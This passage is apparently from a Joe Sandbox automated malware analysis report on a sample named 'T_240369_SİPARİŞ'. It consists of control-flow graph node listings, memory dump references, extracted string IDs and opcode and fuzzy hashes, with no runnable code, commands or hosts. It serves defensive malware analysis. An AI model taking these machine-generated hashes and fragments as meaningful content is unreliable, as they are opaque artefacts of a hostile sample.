1072->1073 1081 5c0f2a0 1073->1081 1082 5c0f29b 1073->1082 1079 5c0f1d2-5c0f1f3 1075->1079 1080 5c0f1ca-5c0f1ce 1075->1080 1084 5c0f2a4 1076->1084 1085 5c0f1f5 1079->1085 1086 5c0f1fa-5c0f1fe 1079->1086 1080->1079 1081->1084 1082->1081 1084->1014 1085->1086 1086->1068 1091 5c0f7e0-5c0f7e9 1089->1091 1092 5c0f966-5c0f9c1 1089->1092 1093 5c0f7f2-5c0f948 1091->1093 1094 5c0f7eb 1091->1094 1107 5c0f9c3-5c0f9f6 1092->1107 1108 5c0f9f8-5c0fa22 1092->1108 1109 5c0f94e 1093->1109 1094->1093 1096 5c0f882-5c0f8c2 1094->1096 1097 5c0f8c7-5c0f907 1094->1097 1098 5c0f7f8-5c0f838 1094->1098 1099 5c0f83d-5c0f87d 1094->1099 1096->1109 1097->1109 1098->1109 1099->1109 1116 5c0fa2b-5c0fae5 1107->1116 1108->1116 1109->1089 1116->1006
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650051244.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5c00000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$TJcq$Te^q$pbq$xbaq
                                                                        • API String ID: 0-2576840827
                                                                        • Opcode ID: 06fcd76027237f63ba91e0f53b09a9c67cc2f4b780bcfd8e3d27a08c4fb831d7
                                                                        • Instruction ID: e1aed5720432e8254e1dc80cef6ac1d4e74ea9bcc2c718d17435ec9a3e9f80cc
                                                                        • Opcode Fuzzy Hash: 06fcd76027237f63ba91e0f53b09a9c67cc2f4b780bcfd8e3d27a08c4fb831d7
                                                                        • Instruction Fuzzy Hash: 4BA2C775A00228CFDB64CF69C984AD9BBB2FF89304F1585E9D509AB365DB319E81CF40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (_^q$Pl^q$$^q
                                                                        • API String ID: 0-912065397
                                                                        • Opcode ID: e1ef865a70c13b4f38d900be4e2d55849c9a54d49f0c90b4a07202a1ca863203
                                                                        • Instruction ID: c91533d0c35e25cfd3d7eb84475b918a0fdcdf569ec999ef13a3fa4a595b7b98
                                                                        • Opcode Fuzzy Hash: e1ef865a70c13b4f38d900be4e2d55849c9a54d49f0c90b4a07202a1ca863203
                                                                        • Instruction Fuzzy Hash: 20423A34B002048FCB14EF69C558E6ABBF6BF89701B2584A9E516CF365DB71EC42CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1745 2f6a130-2f6a15e 1746 2f6a165-2f6a271 1745->1746 1747 2f6a160 1745->1747 1750 2f6a295-2f6a2a1 1746->1750 1751 2f6a273-2f6a28f call 2f6c340 1746->1751 1747->1746 1752 2f6a2a3 1750->1752 1753 2f6a2a8-2f6a2ad 1750->1753 1751->1750 1752->1753 1755 2f6a2e5-2f6a305 1753->1755 1756 2f6a2af-2f6a2bb 1753->1756 1763 2f6a307 1755->1763 1764 2f6a30c-2f6a535 1755->1764 1757 2f6a2c2-2f6a2e0 1756->1757 1758 2f6a2bd 1756->1758 1759 2f6b509-2f6b50f 1757->1759 1758->1757 1761 2f6b511 1759->1761 1762 2f6b519 1759->1762 1761->1762 1766 2f6b51a 1762->1766 1763->1764 1785 2f6aba2-2f6abae 1764->1785 1766->1766 1786 2f6abb4-2f6abec 1785->1786 1787 2f6a53a-2f6a546 1785->1787 1796 2f6acc6-2f6accc 1786->1796 1788 2f6a54d-2f6a60a 1787->1788 1789 2f6a548 1787->1789 1808 2f6a60c-2f6a625 1788->1808 1809 2f6a62b-2f6a67d 1788->1809 1789->1788 1797 2f6acd2-2f6ad0a 1796->1797 1798 2f6abf1-2f6ac6e 1796->1798 1810 2f6b054-2f6b05a 1797->1810 1816 2f6ac70-2f6ac74 1798->1816 1817 2f6aca1-2f6acc3 1798->1817 1808->1809 1827 2f6a67f-2f6a687 1809->1827 1828 2f6a68c-2f6a6d9 1809->1828 1812 2f6b060-2f6b0a8 1810->1812 1813 2f6ad0f-2f6af11 1810->1813 1823 2f6b123-2f6b16e 1812->1823 1824 2f6b0aa-2f6b11d 1812->1824 1909 2f6af17-2f6af97 1813->1909 1910 2f6af9c-2f6afa0 1813->1910 1816->1817 1819 2f6ac76-2f6ac9e 1816->1819 1817->1796 1819->1817 1844 2f6b4d3-2f6b4d9 1823->1844 1824->1823 1831 2f6ab93-2f6ab9f 1827->1831 1845 2f6a6db-2f6a6e3 1828->1845 1846 2f6a6e8-2f6a735 1828->1846 1831->1785 1849 2f6b173-2f6b1cc 1844->1849 1850 2f6b4df-2f6b507 1844->1850 1845->1831 1860 2f6a737-2f6a73f 1846->1860 1861 2f6a744-2f6a791 1846->1861 1864 2f6b1f4-2f6b200 1849->1864 1865 2f6b1ce-2f6b1e9 1849->1865 1850->1759 1860->1831 1890 2f6a793-2f6a79b 1861->1890 1891 2f6a7a0-2f6a7ed 1861->1891 1867 2f6b207-2f6b213 1864->1867 1868 2f6b202 1864->1868 1865->1864 1869 2f6b226-2f6b235 1867->1869 1870 2f6b215-2f6b221 1867->1870 1868->1867 1874 2f6b237 1869->1874 1875 2f6b23e-2f6b49b 1869->1875 1873 2f6b4ba-2f6b4d0 1870->1873 1873->1844 1874->1875 1877 2f6b306-2f6b346 1874->1877 1878 2f6b244-2f6b2ad 1874->1878 1879 2f6b2b2-2f6b301 1874->1879 1880 2f6b390-2f6b3f8 1874->1880 1881 2f6b34b-2f6b38b 1874->1881 1904 2f6b4a6-2f6b4b2 1875->1904 1877->1904 1878->1904 1879->1904 1911 2f6b46c-2f6b472 1880->1911 1881->1904 1890->1831 1917 2f6a7ef-2f6a7f7 1891->1917 1918 2f6a7fc-2f6a849 1891->1918 1904->1873 1928 2f6b03b-2f6b051 1909->1928 1913 2f6afa2-2f6affb 1910->1913 1914 2f6affd-2f6b03a 1910->1914 1915 2f6b474-2f6b47e 1911->1915 1916 2f6b3fa-2f6b458 1911->1916 1913->1928 1914->1928 1915->1904 1931 2f6b45f-2f6b469 1916->1931 1932 2f6b45a 1916->1932 1917->1831 1936 2f6a84b-2f6a853 1918->1936 1937 2f6a858-2f6a8a5 1918->1937 1928->1810 1931->1911 1932->1931 1936->1831 1941 2f6a8a7-2f6a8af 1937->1941 1942 2f6a8b4-2f6a901 1937->1942 1941->1831 1946 2f6a903-2f6a90b 1942->1946 1947 2f6a910-2f6a95d 1942->1947 1946->1831 1951 2f6a95f-2f6a967 1947->1951 1952 2f6a96c-2f6a9b9 1947->1952 1951->1831 1956 2f6a9bb-2f6a9c3 1952->1956 1957 2f6a9c8-2f6aa15 1952->1957 1956->1831 1961 2f6aa17-2f6aa1f 1957->1961 1962 2f6aa24-2f6aa71 1957->1962 1961->1831 1966 2f6aa73-2f6aa7b 1962->1966 1967 2f6aa80-2f6aacd 1962->1967 1966->1831 1971 2f6aacf-2f6aad7 1967->1971 1972 2f6aadc-2f6ab29 1967->1972 1971->1831 1976 2f6ab35-2f6ab82 1972->1976 1977 2f6ab2b-2f6ab33 1972->1977 1981 2f6ab84-2f6ab8c 1976->1981 1982 2f6ab8e-2f6ab90 1976->1982 1977->1831 1981->1831 1982->1831
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2$$^q
                                                                        • API String ID: 0-1071376767
                                                                        • Opcode ID: 2fde18745cca862a53da1c000b9826442d59fea87780dca553cf3569b3089ab6
                                                                        • Instruction ID: 470d80bb77b377c74a25b25e596a55d7655de760fe3ee413c7259c0d1a8dac4f
                                                                        • Opcode Fuzzy Hash: 2fde18745cca862a53da1c000b9826442d59fea87780dca553cf3569b3089ab6
                                                                        • Instruction Fuzzy Hash: CFC2C574E01229CFCB64DF69D984B99BBB6FB89300F1081EAD909A7355DB309E85CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq
                                                                        • API String ID: 0-149360118
                                                                        • Opcode ID: eee4b38f30a15ac2903f9d81eeb258406f8546b207ad69abb37c8921ac74da7c
                                                                        • Instruction ID: 14f71a54cad0fcdde7cdd6486dda13bfdbaa60a3d7c4345371f31c0a95190004
                                                                        • Opcode Fuzzy Hash: eee4b38f30a15ac2903f9d81eeb258406f8546b207ad69abb37c8921ac74da7c
                                                                        • Instruction Fuzzy Hash: F5328D70B0461A9FCB14DF69C49566EFBF2FF88300F248569E56AD7391DB34A901CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Te^q
                                                                        • API String ID: 0-671973202
                                                                        • Opcode ID: 7d24feb9a31089ff13ceacea75f1836c8d8dc2b845f46f12349d76733f1cb05b
                                                                        • Instruction ID: fa7878bc2c66ea54798ca303cb262491584a28d990b3e1280858d2af4c8dbc21
                                                                        • Opcode Fuzzy Hash: 7d24feb9a31089ff13ceacea75f1836c8d8dc2b845f46f12349d76733f1cb05b
                                                                        • Instruction Fuzzy Hash: E1B11874E45218CFDB24CFA9D984BADBBF2FF4A300F1190A9E40AA7255DB746985DF00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6d94b3548cd4a382083f57ce88410dcb50444e7b2f1ec70afba8eae7522dc1de
                                                                        • Instruction ID: 1f97c420d3dbd2cfa19d9d79a6369c0bf1f2d3e37a6285b1c5b3b7a50dc9c5fc
                                                                        • Opcode Fuzzy Hash: 6d94b3548cd4a382083f57ce88410dcb50444e7b2f1ec70afba8eae7522dc1de
                                                                        • Instruction Fuzzy Hash: F932C474A40229CFCB65DF28C988AA9BBB6FF48304F1085D9D90DA7351DB31AE85CF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 64f1c61caec5511cb1f5485b278b2e90ca311c1c4a8ae6262f4e21286b949cbe
                                                                        • Instruction ID: 8ce94775631c000fc9ec377ee60e6002ff958c349b4b479a9222c41b8f46d207
                                                                        • Opcode Fuzzy Hash: 64f1c61caec5511cb1f5485b278b2e90ca311c1c4a8ae6262f4e21286b949cbe
                                                                        • Instruction Fuzzy Hash: 49C1B074E06218CFEB54DF69E984BADBBF6FF89344F1090A9D419A7250DB346A85CF00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a88bdc448df5bcdb26ed97fd95435d43da5a6d92a308745df9a463c278ed2e2f
                                                                        • Instruction ID: 9a4230b7a8f6062ae4e47b70248de274d96243f45ee2f5e55f7f08a871149f5c
                                                                        • Opcode Fuzzy Hash: a88bdc448df5bcdb26ed97fd95435d43da5a6d92a308745df9a463c278ed2e2f
                                                                        • Instruction Fuzzy Hash: 8BC1BF74E06218CFEB54DF69E984BADBBF6FF89340F1090A9D41AA7250DB346985CF40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6cbd5806ee9efbcdba42c031aae0be89d892e6d2f30eabfd5d035d7aa11156c6
                                                                        • Instruction ID: 1ad3cc9a7a1cfb8f04f45797a5be46f73cc31eb22b5f77394d05d51e47bdcc1d
                                                                        • Opcode Fuzzy Hash: 6cbd5806ee9efbcdba42c031aae0be89d892e6d2f30eabfd5d035d7aa11156c6
                                                                        • Instruction Fuzzy Hash: DFB18E74E06218CFDB54DFA9E984BADBBF6FF49340F1094A9D41AA7250DB346985CF00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 14cd74a7fa930dc378a7bc834b2333f0d5ada1db4ffd425a13e79720dafc2f66
                                                                        • Instruction ID: 2571eaa854a0cf2951273bebbde5f8577ac813f629447ecd06aefba9fcd01ddd
                                                                        • Opcode Fuzzy Hash: 14cd74a7fa930dc378a7bc834b2333f0d5ada1db4ffd425a13e79720dafc2f66
                                                                        • Instruction Fuzzy Hash: 67817D71A00609CFE715CF89C9887BAB7B2FBC4390F94C567CA15AB658D334A946CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 79372a21a93d6dbd033d84f64785db870f42715aef37af20ee381a1699a11cbd
                                                                        • Instruction ID: e717a0c345a50e7eb5aeba6c490c8b9c3ea12876837c646b265671c0857cd756
                                                                        • Opcode Fuzzy Hash: 79372a21a93d6dbd033d84f64785db870f42715aef37af20ee381a1699a11cbd
                                                                        • Instruction Fuzzy Hash: 1B61B270D46618CFDB34CFA9D949BADBBF2BF49300F1490A9D40AAB291DB746985DF00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5203faa2e33cec6732517a27a61d18bd2d39671051746c11e2359cbec1c2525f
                                                                        • Instruction ID: adb2b3acab99c58371419084fe0b4060bcd352c353f73f7ebe9b22a3a72dc8a3
                                                                        • Opcode Fuzzy Hash: 5203faa2e33cec6732517a27a61d18bd2d39671051746c11e2359cbec1c2525f
                                                                        • Instruction Fuzzy Hash: 2C5119B1E006588BEB18CF6BD94479AFBF3BFC8304F14C1AAD508A6255EB340A85CF55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d10870b9d75efcf2f157b77bf83d3f069bb6ff321483d88d0588c2030afbbbf
                                                                        • Instruction ID: 74a8b9214050edad031f739dd6853547966d9030f66e1e98c9de4996f32cec6b
                                                                        • Opcode Fuzzy Hash: 0d10870b9d75efcf2f157b77bf83d3f069bb6ff321483d88d0588c2030afbbbf
                                                                        • Instruction Fuzzy Hash: 0E4146B5E016198BDB18CFABD94069EFBF3BFC8300F14C16AD558AB224EB3459458F54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4644ac1900111a54787fd67108b3a989eeb804621a2b2eae615302c616c0ea55
                                                                        • Instruction ID: 000c2c759d29ff3b8c83fe34db035799e626da755e6979135fb38267aa5691b3
                                                                        • Opcode Fuzzy Hash: 4644ac1900111a54787fd67108b3a989eeb804621a2b2eae615302c616c0ea55
                                                                        • Instruction Fuzzy Hash: E74139B5E016198BDB1CCFABC94069EFAF3BFC8300F14C07A9958AB264EB7459418F54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1353 5ad74c8-5ad74f0 1355 5ad753e-5ad754c 1353->1355 1356 5ad74f2-5ad7539 1353->1356 1357 5ad754e-5ad7559 call 5ad4fe8 1355->1357 1358 5ad755b 1355->1358 1404 5ad7995-5ad799c 1356->1404 1359 5ad755d-5ad7564 1357->1359 1358->1359 1362 5ad764d-5ad7651 1359->1362 1363 5ad756a-5ad756e 1359->1363 1367 5ad76a7-5ad76b1 1362->1367 1368 5ad7653-5ad7662 call 5ad31e8 1362->1368 1365 5ad799d-5ad79c5 1363->1365 1366 5ad7574-5ad7578 1363->1366 1376 5ad79cc-5ad79f6 1365->1376 1370 5ad758a-5ad75e8 call 5ad4d28 call 5ad5790 1366->1370 1371 5ad757a-5ad7584 1366->1371 1372 5ad76ea-5ad7710 1367->1372 1373 5ad76b3-5ad76c2 call 5ad28c8 1367->1373 1384 5ad7666-5ad766b 1368->1384 1415 5ad75ee-5ad7648 1370->1415 1416 5ad7a5b-5ad7a85 1370->1416 1371->1370 1371->1376 1397 5ad771d 1372->1397 1398 5ad7712-5ad771b 1372->1398 1387 5ad79fe-5ad7a14 1373->1387 1388 5ad76c8-5ad76e5 1373->1388 1376->1387 1389 5ad766d-5ad76a2 call 5ad6f90 1384->1389 1390 5ad7664 1384->1390 1413 5ad7a1c-5ad7a54 1387->1413 1388->1404 1389->1404 1390->1384 1405 5ad771f-5ad7747 1397->1405 1398->1405 1420 5ad774d-5ad7766 1405->1420 1421 5ad7818-5ad781c 1405->1421 1413->1416 1415->1404 1423 5ad7a8f-5ad7a95 1416->1423 1424 5ad7a87-5ad7a8d 1416->1424 1420->1421 1447 5ad776c-5ad777b call 5ad22f0 1420->1447 1425 5ad781e-5ad7837 1421->1425 1426 5ad7896-5ad78a0 1421->1426 1424->1423 1428 5ad7a96-5ad7ad3 1424->1428 1425->1426 1453 5ad7839-5ad7848 call 5ad22f0 1425->1453 1430 5ad78fd-5ad7906 1426->1430 1431 5ad78a2-5ad78ac 1426->1431 1433 5ad793e-5ad798b 1430->1433 1434 5ad7908-5ad7936 call 5ad4520 call 5ad4540 1430->1434 1445 5ad78ae-5ad78b0 1431->1445 1446 5ad78b2-5ad78c4 1431->1446 1459 5ad7993 1433->1459 1434->1433 1448 5ad78c6-5ad78c8 1445->1448 1446->1448 1461 5ad777d-5ad7783 1447->1461 1462 5ad7793-5ad77a8 1447->1462 1457 5ad78ca-5ad78ce 1448->1457 1458 5ad78f6-5ad78fb 1448->1458 1476 5ad784a-5ad7850 1453->1476 1477 5ad7860-5ad786b 1453->1477 1464 5ad78ec-5ad78f1 call 5ad10f0 1457->1464 1465 5ad78d0-5ad78e9 1457->1465 1458->1430 1458->1431 1459->1404 1469 5ad7785 1461->1469 1470 5ad7787-5ad7789 1461->1470 1473 5ad77dc-5ad77e5 1462->1473 1474 5ad77aa-5ad77d6 call 5ad3670 1462->1474 1464->1458 1465->1464 1469->1462 1470->1462 1473->1416 1484 5ad77eb-5ad7812 1473->1484 1474->1413 1474->1473 1478 5ad7854-5ad7856 1476->1478 1479 5ad7852 1476->1479 1477->1416 1480 5ad7871-5ad7894 1477->1480 1478->1477 1479->1477 1480->1426 1480->1453 1484->1421 1484->1447
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Hbq$Hbq$Hbq
                                                                        • API String ID: 0-2297679979
                                                                        • Opcode ID: e15ba6802177c04d65021ffae27438c976ce6f109dec8704adbd2bf6f41e58d2
                                                                        • Instruction ID: 217a9a970bbb7ca9b7b1111cefeb817addb677f9910032d52f3387003af38170
                                                                        • Opcode Fuzzy Hash: e15ba6802177c04d65021ffae27438c976ce6f109dec8704adbd2bf6f41e58d2
                                                                        • Instruction Fuzzy Hash: D6123035B002059FCB68EFA9D594A6EBBF2FF88300F148569D4169B394DB35EC45CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1495 5ad9188-5ad91c5 1497 5ad91e7-5ad91fd call 5ad8f90 1495->1497 1498 5ad91c7-5ad91ca 1495->1498 1504 5ad9573-5ad9587 1497->1504 1505 5ad9203-5ad920f 1497->1505 1609 5ad91cc call 5ad9af8 1498->1609 1610 5ad91cc call 5ad9aa0 1498->1610 1500 5ad91d2-5ad91d4 1500->1497 1502 5ad91d6-5ad91de 1500->1502 1502->1497 1514 5ad95c7-5ad95d0 1504->1514 1506 5ad9215-5ad9218 1505->1506 1507 5ad9340-5ad9347 1505->1507 1511 5ad921b-5ad9224 1506->1511 1508 5ad934d-5ad9356 1507->1508 1509 5ad9476-5ad94bf call 5ad8998 call 5adb930 1507->1509 1508->1509 1512 5ad935c-5ad9468 call 5ad8998 call 5ad8f28 call 5ad8998 1508->1512 1558 5ad94c8-5ad956a call 5ad8998 1509->1558 1515 5ad9668 1511->1515 1516 5ad922a-5ad923e 1511->1516 1606 5ad946a 1512->1606 1607 5ad9473 1512->1607 1517 5ad9595-5ad959e 1514->1517 1518 5ad95d2-5ad95d9 1514->1518 1520 5ad966d-5ad9671 1515->1520 1529 5ad9244-5ad92d9 call 5ad8f90 * 2 call 5ad8998 call 5ad8f28 call 5ad8fd0 call 5ad9078 call 5ad90e0 1516->1529 1530 5ad9330-5ad933a 1516->1530 1517->1515 1522 5ad95a4-5ad95b6 1517->1522 1523 5ad95db-5ad961e call 5ad8998 1518->1523 1524 5ad9627-5ad962e 1518->1524 1525 5ad967c 1520->1525 1526 5ad9673 1520->1526 1542 5ad95b8-5ad95bd 1522->1542 1543 5ad95c6 1522->1543 1523->1524 1532 5ad9630-5ad9640 1524->1532 1533 5ad9653-5ad9666 1524->1533 1537 5ad967d 1525->1537 1526->1525 1586 5ad92f8-5ad932b call 5ad90e0 1529->1586 1587 5ad92db-5ad92f3 call 5ad9078 call 5ad8998 call 5ad8c48 1529->1587 1530->1507 1530->1511 1532->1533 1544 5ad9642-5ad964a 1532->1544 1533->1520 1537->1537 1611 5ad95c0 call 5adc0c0 1542->1611 1612 5ad95c0 call 5adc0d0 1542->1612 1543->1514 1544->1533 1558->1504 1586->1530 1587->1586 1606->1607 1607->1509 1609->1500 1610->1500 1611->1543 1612->1543
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q$4'^q
                                                                        • API String ID: 0-1196845430
                                                                        • Opcode ID: 506c3d6da2f3c67deb70b746d54cf32cbab4d6b11c8af8e547dd8ce03fc817a3
                                                                        • Instruction ID: 05bfdcee10e6bbcaf235a33646054d99e2199a1691e44d36e2f7cb326f425595
                                                                        • Opcode Fuzzy Hash: 506c3d6da2f3c67deb70b746d54cf32cbab4d6b11c8af8e547dd8ce03fc817a3
                                                                        • Instruction Fuzzy Hash: C1F1B834A10118DFCB08EBA4D598E9DBBB2FF88305F118558E506AB3A5DB35EC46CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1613 5add752-5add759 1614 5add75b-5add770 1613->1614 1615 5add710-5add720 1613->1615 1618 5add889-5add8ae 1614->1618 1619 5add776-5add77a 1614->1619 1616 5add727-5add74d 1615->1616 1617 5add722-5add726 1615->1617 1620 5add8b5-5add8da 1618->1620 1619->1620 1621 5add780-5add789 1619->1621 1624 5add8e1-5add917 1620->1624 1623 5add78f-5add7b6 1621->1623 1621->1624 1637 5add7bc-5add7be 1623->1637 1638 5add87e-5add888 1623->1638 1642 5add91e-5add928 1624->1642 1639 5add7df-5add7e1 1637->1639 1640 5add7c0-5add7c3 1637->1640 1644 5add7e4-5add7e8 1639->1644 1640->1642 1643 5add7c9-5add7d3 1640->1643 1654 5add92b-5add974 1642->1654 1655 5add8e0 1642->1655 1643->1642 1649 5add7d9-5add7dd 1643->1649 1647 5add849-5add855 1644->1647 1648 5add7ea-5add7f9 1644->1648 1647->1642 1650 5add85b-5add878 call 5ad1120 1647->1650 1648->1642 1657 5add7ff-5add846 call 5ad1120 1648->1657 1649->1639 1649->1644 1650->1637 1650->1638 1663 5add998-5add9a5 1654->1663 1664 5add976-5add98a 1654->1664 1655->1624 1657->1647 1743 5add9a7 call 5b70f49 1663->1743 1744 5add9a7 call 5b70f58 1663->1744 1739 5add98d call 5addfd8 1664->1739 1740 5add98d call 5adde78 1664->1740 1741 5add98d call 5adde72 1664->1741 1742 5add98d call 5ade002 1664->1742 1670 5add993 1672 5addbc3-5addbce 1670->1672 1671 5add9ad-5add9af 1673 5add9b5-5adda9b call 5ad8f90 call 5ad8998 * 2 call 5ad8fd0 call 5adc798 call 5ad8998 call 5adb930 call 5ad9838 1671->1673 1674 5addaa0-5addab0 1671->1674 1682 5addbfd-5addc1e call 5ad90e0 1672->1682 1683 5addbd0-5addbe0 1672->1683 1673->1674 1680 5addb9e-5addbba call 5ad8998 1674->1680 1681 5addab6-5addb90 call 5ad8f90 * 2 call 5ad9748 call 5ad8998 * 2 call 5ad8c48 call 5ad90e0 call 5ad8998 1674->1681 1680->1672 1736 5addb9b 1681->1736 1737 5addb92 1681->1737 1695 5addbf0-5addbf8 call 5ad9838 1683->1695 1696 5addbe2-5addbe8 1683->1696 1695->1682 1696->1695 1736->1680 1737->1736 1739->1670 1740->1670 1741->1670 1742->1670 1743->1671 1744->1671
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
